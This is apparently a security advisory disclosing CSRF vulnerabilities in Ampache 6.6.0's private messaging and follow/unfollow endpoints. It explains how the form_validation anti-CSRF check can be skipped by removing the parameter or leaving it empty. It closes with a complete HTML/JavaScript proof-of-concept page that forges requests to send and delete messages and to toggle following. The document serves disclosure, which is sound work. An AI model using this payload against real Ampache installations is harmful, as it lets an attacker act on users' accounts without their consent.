Product detail

Affected product: Ampache
Affected version: 6.6.0
Affected component: private message and follow/unfollow

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities exist in the private messaging and follower/following functions in Ampache versions up to 6.6.0. These vulnerabilities affect the endpoints 'pvmsg.php?action=add_message', 'pvmsg.php?action=confirm_delete', and 'ajax.server.php?page=user&action=flip_follow', allowing malicious users to perform unauthorized actions such as sending or deleting private messages and following or unfollowing users without consent.

Prerequisite

Install Ampache from official Ampache Github repository GitHub page

Ampache version 6.6.0 released on Aug 1


Installed Ampache version 6.6.0


Exploitation

The form_validation parameter is used for anti-CSRF in many APIs, including admin functions.

The below image shows that if form_validation value is not valid or removed the request, the server response with 403 Access denied in this case.



However, for actions like sending or deleting private messages, as well as following or unfollowing users, the form_validation parameter is not utilized.
We can send an empty value or remove the parameter, and the server will still accept the request.

For the send private message API, although the form_validation parameter exists.



it can be bypassed by removing a parameter.



For the delete private message API is the same case as send private message.



But we can send an empty value or remove the parameter as well.



In the case of follow/unfollow actions, there is no use of the form_validation parameter or any anti-CSRF token.



Use the CSRF HTML code below to demonstrate the attack, where the victim must click the button.


<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>CSRF Attack</title> </head> <body> <form id="csrfFormMessage" action="http://localhost/pvmsg.php?action=add_message" method="POST"> <input type="hidden" name="to_user" value="test"> <input type="hidden" name="subject" value="test_csrf"> <input type="hidden" name="message" value="test_csrf"> <button type="submit">Send Message</button> </form> <br><br> <button id="deleteMessagesButton">Delete Messages</button> <br><br> <button id="flipFollowButton">Follow/Unfollow User</button> <script> document.getElementById('deleteMessagesButton').addEventListener('click', function() { let form = document.createElement('form'); form.method = 'POST'; form.action = 'http://localhost/pvmsg.php?action=confirm_delete&msgs=52'; let input = document.createElement('input'); input.type = 'hidden'; input.name = 'form_validation'; input.value = ''; form.appendChild(input); document.body.appendChild(form); form.submit(); document.body.removeChild(form); }); document.getElementById('flipFollowButton').addEventListener('click', function() { let form = document.createElement('form'); form.method = 'POST'; form.action = 'http://localhost/server/ajax.server.php?page=user&action=flip_follow&user_id=2'; document.body.appendChild(form); form.submit(); document.body.removeChild(form); }); </script> </body> </html>

CSRF case: send private message



CSRF case: delete private message



CSRF case: follow/unfollow